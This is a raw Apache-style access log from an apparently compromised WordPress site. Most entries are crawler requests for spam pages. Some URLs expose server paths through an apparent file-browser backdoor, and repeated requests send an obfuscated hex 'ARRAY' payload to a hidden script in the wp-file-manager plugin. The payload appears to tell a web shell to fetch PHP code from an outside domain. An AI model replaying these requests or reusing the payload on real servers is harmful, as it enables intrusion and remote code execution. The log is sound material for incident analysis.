66.249.73.162 - - [28/Apr/2026:07:31:06 +0300] "GET /shop/poisonously/yeared11686548342.html HTTP/1.1" 200 29432 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.6 - - [28/Apr/2026:07:31:12 +0300] "GET /index.php?shop%2Fhygrophthalmic%2Ftigerine053948336649.html HTTP/1.1" 200 10394 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [28/Apr/2026:07:29:14 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343135342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303535342q3862346538343632623966373430346333353361666537656364666535616139222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
198.244.183.20 - - [28/Apr/2026:07:31:15 +0300] "GET /detail/419245659?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-cron.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 4917 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
103.136.107.118 - - [28/Apr/2026:07:31:14 +0300] "GET /13739-2/ HTTP/1.1" 200 8693 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.136.107.118 - - [28/Apr/2026:07:31:16 +0300] "GET /13739-2/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/55ece37ba5f55f1032982f56b7fbfb48&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5521 "https://miroglu.net/13739-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
66.249.73.162 - - [28/Apr/2026:07:31:21 +0300] "GET /shop/blepharitic/epicureous36505591045.html HTTP/1.1" 200 29228 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:31:23 +0300] "GET /?prizes/99395575 HTTP/1.1" 200 29027 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [28/Apr/2026:07:29:35 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343137352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303537352q6133633464313236396664396133323330306231303439616439343865363031222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
198.244.183.231 - - [28/Apr/2026:07:31:39 +0300] "GET /detail/418204945?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes HTTP/2" 200 11354 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [28/Apr/2026:07:31:42 +0300] "GET /shop/always/stylist014115081367.html HTTP/1.1" 200 29518 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.4 - - [28/Apr/2026:07:31:44 +0300] "GET /index.php?shop%2Ftinus%2Fterce053371040015.html HTTP/1.1" 200 10388 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:31:45 +0300] "GET /shop/letted/oulong12898310553.html HTTP/1.1" 200 28640 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:31:54 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FProxy%2FHttp.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FProxy HTTP/2" 200 4249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [28/Apr/2026:07:29:57 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343139372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303539372q3432643966303164663865643766393362363235303864633564326164303464222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [28/Apr/2026:07:32:00 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FCrypto32.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc HTTP/2" 200 10047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:32:00 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FCrypto.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc HTTP/2" 200 9957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.199 - - [28/Apr/2026:07:32:02 +0300] "GET /index.php?shop%2Facuity%2Fdrengage05210491516.html HTTP/1.1" 200 10390 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.164 - - [28/Apr/2026:07:32:02 +0300] "GET /shop/specialities/dippers571945078582.html HTTP/1.1" 200 28810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.164 - - [28/Apr/2026:07:32:03 +0300] "GET /shop/nonattention/tuppence662169381532.html HTTP/1.1" 200 30889 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.242.228 - - [28/Apr/2026:07:32:05 +0300] "GET /detail/405657675?fileloc=/var/www/vhosts/miroglu.net/httpdocs/comment.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 5089 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.164 - - [28/Apr/2026:07:32:07 +0300] "GET /shop/asymmetric/countermarched451131450099.html HTTP/1.1" 200 28166 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
52.167.144.172 - - [28/Apr/2026:07:32:09 +0300] "GET /sitemap-sub-573.xml HTTP/2" 200 38186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.73.162 - - [28/Apr/2026:07:32:13 +0300] "GET /shop/propitiatorily/reticulation35935523214.html HTTP/1.1" 200 29635 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.202 - - [28/Apr/2026:07:32:14 +0300] "GET /index.php?shop%2Fjudeochristian%2Fbitume053442130502.html HTTP/1.1" 200 10327 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
77.75.77.32 - - [28/Apr/2026:07:32:17 +0300] "GET /robots.txt HTTP/1.1" 200 664 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)"
77.75.77.32 - - [28/Apr/2026:07:32:17 +0300] "GET /shop/tributariness/inundate041554222114.html HTTP/1.1" 200 10240 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)"
185.216.113.70 - - [28/Apr/2026:07:30:19 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343231392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303631392q3361636431646235666665383833363262613536613730653934653635386561222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [28/Apr/2026:07:32:22 +0300] "GET /shop/redeye/duckling703802230137.html HTTP/1.1" 200 29484 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.206 - - [28/Apr/2026:07:32:25 +0300] "GET /index.php?shop%2Fsestet%2Fbrillance051793003337.html HTTP/1.1" 200 10386 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:32:26 +0300] "GET /?detail/97035962 HTTP/1.1" 200 29797 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:32:26 +0300] "GET /shop/pimpled/burlap822879386525.html HTTP/1.1" 200 30837 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
198.244.183.88 - - [28/Apr/2026:07:32:30 +0300] "GET /detail/397212374?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-activate.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 7551 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.78.1 - - [28/Apr/2026:07:32:30 +0300] "GET /shop/ridiculer/idist513176582693.html HTTP/1.1" 200 29914 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:32:35 +0300] "GET /shop/testicular/turnsick113618691233.html HTTP/1.1" 200 30740 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:30:41 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343234312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303634312q3732353334383138326439383762653338343730636464333438663035383864222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [28/Apr/2026:07:32:47 +0300] "GET /?detail/840763655 HTTP/1.1" 200 29042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.201 - - [28/Apr/2026:07:32:48 +0300] "GET /index.php?shop%2Fhandlebar%2Fadays051824286095.html HTTP/1.1" 200 10382 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:32:55 +0300] "GET /shop/gyroidal/thickskulled603546096947.html HTTP/1.1" 200 29623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
51.195.183.139 - - [28/Apr/2026:07:32:57 +0300] "GET /detail/385522605?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin HTTP/2" 200 6499 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.165 - - [28/Apr/2026:07:33:01 +0300] "GET /shop/jesuited/aponeurosis733743192481.html HTTP/1.1" 200 29189 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.3 - - [28/Apr/2026:07:33:02 +0300] "GET /shop/indigent/uptear082663491734.html HTTP/1.1" 200 31043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.22.237.196 - - [28/Apr/2026:07:33:03 +0300] "GET /discover-the-power-of-dexscreener-for-efficient-trading/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages/wp-file-manager-th.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages HTTP/1.1" 200 13817 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.216.113.70 - - [28/Apr/2026:07:31:03 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343236332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303636332q3139633039323839323939633536343365376465383933636465313931643862222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [28/Apr/2026:07:33:09 +0300] "GET /shop/frank/assignat281570435333.html HTTP/1.1" 200 28953 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.207 - - [28/Apr/2026:07:33:13 +0300] "GET /index.php?shop%2Fcolumned%2Fbewildering051047637082.html HTTP/1.1" 200 10361 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:33:15 +0300] "GET /?detail/117145066 HTTP/1.1" 200 30002 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.9 - - [28/Apr/2026:07:33:16 +0300] "GET /index.php?shop%2Fviennese%2Falkalize053507029368.html HTTP/1.1" 200 10382 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
51.195.183.250 - - [28/Apr/2026:07:33:22 +0300] "GET /detail/382192629?path=/ HTTP/2" 200 4968 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [28/Apr/2026:07:33:22 +0300] "GET /shop/sandish/haint192398441816.html HTTP/1.1" 200 30815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:31:25 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343238352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303638352q6537633963326534316630303434313866333931343135326162333834343135222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [28/Apr/2026:07:33:29 +0300] "GET /shop/pythagorean/clitoral232130591118.html HTTP/1.1" 200 28500 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:33:42 +0300] "GET /shop/misenter/spalpeen29711377642.html HTTP/1.1" 200 28334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [28/Apr/2026:07:31:46 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343330362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303730362q3134626332613035373333666335613239646562333535383661623232356261222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
198.244.183.27 - - [28/Apr/2026:07:33:47 +0300] "GET /detail/115685256?fileloc=/var/www/vhosts/miroglu.net/httpdocs/robots.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 2876 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [28/Apr/2026:07:33:47 +0300] "GET /shop/metagrammatism/plautus512366734546.html HTTP/1.1" 200 28426 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:33:52 +0300] "GET /shop/certain/osmometer853795071078.html HTTP/1.1" 200 30022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.164 - - [28/Apr/2026:07:33:59 +0300] "GET /shop/encumbered/myodes193714006320.html HTTP/1.1" 200 29725 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:34:02 +0300] "GET /kasyno-na-komorke-na-pieniadze/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmanager%2Fjs%2Fproxy%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmanager%2Fjs%2Fproxy HTTP/2" 200 2982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [28/Apr/2026:07:32:08 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343332382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303732382q3965363434666438363664373364323334353864393165326566366634323862222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
198.244.226.181 - - [28/Apr/2026:07:34:12 +0300] "GET /detail/111540095?path=/var/www/vhosts HTTP/2" 200 5005 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [28/Apr/2026:07:34:13 +0300] "GET /shop/rules/bactrianus972891583844.html HTTP/1.1" 200 30431 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:34:16 +0300] "GET /shop/ptyalin/anorthopia652760302441.html HTTP/1.1" 200 29501 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.3 - - [28/Apr/2026:07:34:17 +0300] "GET /index.php?shop%2Fconclusions%2Fconnature052935810741.html HTTP/1.1" 200 10385 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
17.241.227.69 - - [28/Apr/2026:07:34:24 +0300] "GET /kraken-aktual-nye-onion-ssylki-dlia-2026-goda-2/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test HTTP/1.1" 200 8276 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
198.54.134.252 - - [28/Apr/2026:07:34:27 +0300] "GET /.well-known/dnt-policy.txt HTTP/1.1" 200 83528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
185.216.113.70 - - [28/Apr/2026:07:32:29 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343334392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303734392q6435643765323466363433636263656537663532333335626230316231336362222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
190.113.110.150 - - [28/Apr/2026:07:34:30 +0300] "GET /11972-2/2?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/theme-compat HTTP/1.1" 200 3893 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
66.249.78.1 - - [28/Apr/2026:07:34:32 +0300] "GET /shop/ketine/ought392831282381.html HTTP/1.1" 200 30442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
187.137.170.111 - - [28/Apr/2026:07:34:33 +0300] "GET /h1-your-essential-guide-to-mastering-tronscan-for-crypto-tracking-h1/?path=/var/www/vhosts/miroglu.net HTTP/1.1" 200 7471 "https://miroglu.net/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
198.244.168.236 - - [28/Apr/2026:07:34:35 +0300] "GET /detail/110505651?fileloc=/var/www/vhosts/miroglu.net/httpdocs/robots.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 2876 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [28/Apr/2026:07:34:37 +0300] "GET /shop/daniel/foretaste124023248921.html HTTP/1.1" 200 28119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:34:43 +0300] "GET /shop/contention/iridectomy2846369258.html HTTP/1.1" 200 30581 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:34:49 +0300] "GET /?detail/953329392 HTTP/1.1" 200 30590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [28/Apr/2026:07:32:51 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343337312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303737312q3130613361346664333637666438303465353436373565653137316666383064222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
